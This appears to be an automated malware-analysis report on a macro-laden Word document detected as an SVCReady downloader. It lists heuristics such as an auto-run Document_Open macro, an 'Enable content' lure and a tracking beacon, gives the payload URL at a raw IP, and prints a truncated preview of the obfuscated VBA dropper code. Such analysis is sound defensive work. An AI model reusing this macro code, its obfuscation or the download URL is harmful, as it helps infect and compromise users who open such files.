Malware Insights
The sample is an OOXML document containing VBA macros, including a Document_Open macro that uses CreateObject to execute code. The document body explicitly instructs the user to 'Enable editing' and 'Enable content', indicating a social engineering lure. The VBA script appears to download a payload from the URL http://64.188.27.166/ts/W9gJctVTVtb9pCt9DPnhT1CK8_k2gTNgfw~~/djal-AcEj3HsWTRuN9tJJAl5jMecfVKm9A~~/, which is also referenced as an external relationship and a remote image beacon. This suggests the document's primary purpose is to act as a downloader for further malicious activity.
Heuristics (9)
- ClamAV: Doc.Downloader.SVCReady-c5c43a913b3eccc9-9953477-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.SVCReady-c5c43a913b3eccc9-9953477-0
- VBA project inside OOXML (medium, 3 related findings, OOXML_VBA): Document contains a VBA project — VBA macros present
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Remote image (web beacon / tracking pixel) (medium, OOXML_IMAGE_BEACON): Document references an external image URL — loads automatically on open, revealing IP address and timestamp to the server (used for phishing tracking and NTLM hash theft on corporate networks)
- External relationship (medium, OOXML_EXTERNAL_REL): External target in word/_rels/document.xml.rels: http://64.188.27.166/ts/W9gJctVTVtb9pCt9DPnhT1CK8_k2gTNgfw~~/djal-AcEj3HsWTRuN9tJJAl5jMecfVKm9A~~/
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://64.188.27.166/ts/W9gJctVTVtb9pCt9DPnhT1CK8_k2gTNgfw~~/djal-AcEj3HsWTRuN9tJJAl5jMecfVKm9A~~/ : OOXML external relationship
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas : in document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2014/chartex : in document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 : in document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships : in document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/math : in document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing : in document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing : in document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main : in document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordml : in document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2012/wordml : in document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2015/wordml/symex : in document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup : in document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk : in document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2006/wordml : in document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape : in document text (OOXML body / shared strings)
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9123 bytes |

SHA-256: 89cc58196fdc847cd808467c41932346efba070ee994d3c42a3ada98a91ad472

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function cro(x)
Set cro = _
CreateObject _
(x)
End Function
Private Function pdni(x, b)
Set pdni = x. _
Exec _
(b)
End Function
Function forbt3g480ocx6naul52fe()
Dim s5cv As String: s5cv = ""
s5cv = "" & ActiveDocument.Bookmarks.Item("stde3mwshe1lxl0oep4i7zc").Range.text
Dim vfr1 As String: vfr1 = ""
vfr1 = vfr1 & " Serologic lilting ambulatorium factitude preignition abomasa"
vfr1 = vfr1 & " Autonoe polarizations budges abomasa barbaloin ascogone"
vfr1 = vfr1 & " Bludging"
vfr1 = ghiojhe(vfr1)
Dim xs5cv As String: xs5cv = xsx(ghiojhe(s5cv), ActiveDocument.CustomDocumentProperties("06bw6vqqjbj92c22a49enub").Value)
Dim vjsy As String: vjsy = ""
vjsy = vjsy & " Immortalist fettles challengers koerlin clabularium"
vjsy = vjsy & " Nonvolatilized misrate squadding rabassa palanquiningly"
vjsy = vjsy & " Thymelaeales clabularium tuberculoprotein diversely enfrenzy"
vjsy = vjsy & " Abomasa hierarchize assiniboine lorris"
vjsy = vjsy & " Grimacier ambulatorium factitude preignition"
vjsy = vjsy & " Orpington assailant lignocaine escapeless"
vjsy = vjsy & " Curbings thymelaeales chlamydospore fettler"
vjsy = vjsy & " Overpleased thoracentesis bludging budger uncorrupt"
vjsy = vjsy & " Turkophile nonallegoric decapitalization turkophile incompatibilities"
vjsy = vjsy & " Grig coxcombess picote autoerotism coxcombess"
vjsy = vjsy & " Quinquepetaloid nonane lilting wolf-shaped nre cacanapa"
vjsy = vjsy & " Sauch terat- budges turkophile operantly premonitive"
vjsy = vjsy & " Eureka rehumanize incompatibilities suasoria gabrielrache fettles"
vjsy = vjsy & " Fala pharyngobranchiate immortalist everbearer bodkins civitan"
vjsy = vjsy & " Rabassa lilting koerlin"
vjsy = vjsy & " Nonremission compassionless fettles"
vjsy = vjsy & " Grimacier immunises pseudoascetical"
vjsy = vjsy & " Rachycentron abomasa quinquepetaloid"
vjsy = vjsy & " Nonremission fettles lilting"
vjsy = vjsy & " Versemongery pseudoascetical housemen"
vjsy = vjsy & " Perjinkly scurflike bludging"
vjsy = vjsy & " Undrainable budges puckermouth"
vjsy = vjsy & " Rethunder undrainable nematocyst"
vjsy = vjsy & " Immuniser squelch protegees"
vjsy = vjsy & " Hainai suasoria lilting"
vjsy = vjsy & " Versemongery factitude rachycentron"
vjsy = vjsy & " Fala quinquepetaloid possessioner"
vjsy = vjsy & " Diversely pumpable immuniser"
vjsy = vjsy & " Succinimid diversely scurflike"
vjsy = vjsy & " Inerrable irresistless skinked"
vjsy = vjsy & " Equated layperson forbare solutionist red-crowned pedicurists"
vjsy = vjsy & " Nonallegoric incorruptible thoracentesis unbeseemingly lignocaine budges"
vjsy = vjsy & " Escapeless ascogone hasbro greatened trinity budges"
vjsy = vjsy & " Rehumanize trinity undrainable muchacho underwrapping"
vjsy = vjsy & " Nonane misrate enp- remote autoerotism"
vjsy = vjsy & " Curbings mountained diversely dirgeman premiered"
vjsy = vjsy & " Dreaded misrate fleabug sauch nonvolatilized"
vjsy = vjsy & " Grimacier wolf-shaped misrate undrainable hypertechnically"
vjsy = vjsy & " Pharyngobranchiate kingcob rehumanize serious-mindedly razors"
vjsy = vjsy & " Pharyngobranchiate uncorrupt perjinkly unpracticality unwalkable lavena"
vjsy = vjsy & " Lilting versemongery volvelle cacanapa abulfeda brazenfacedly"
vjsy = vjsy & " Subpermanently underwrapping autoerotism adjures rehumanize decapitalization"
vjsy = vjsy & " Fleabug puckermouth nonallegoric clabularium signalled beclart"
vjsy = vjsy & " Grig overgratify nondistortedness serologic lilting"
vjsy = vjsy & " Immunises lignocaine housemen abomasa brazenfacedly"
vjsy = vjsy & " Countervaunt lagune operantly perjinkly rabassa"
vjsy = vjsy & " Boyaux sauch psychoclinical spluther"
vjsy = vjsy & " Immunises misrate budg
... (truncated)
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 33280 bytes |

SHA-256: 496e8ef135c21822bc7fe0f97c2239b4cbfce983327b42dfc1093b3cb84a32b5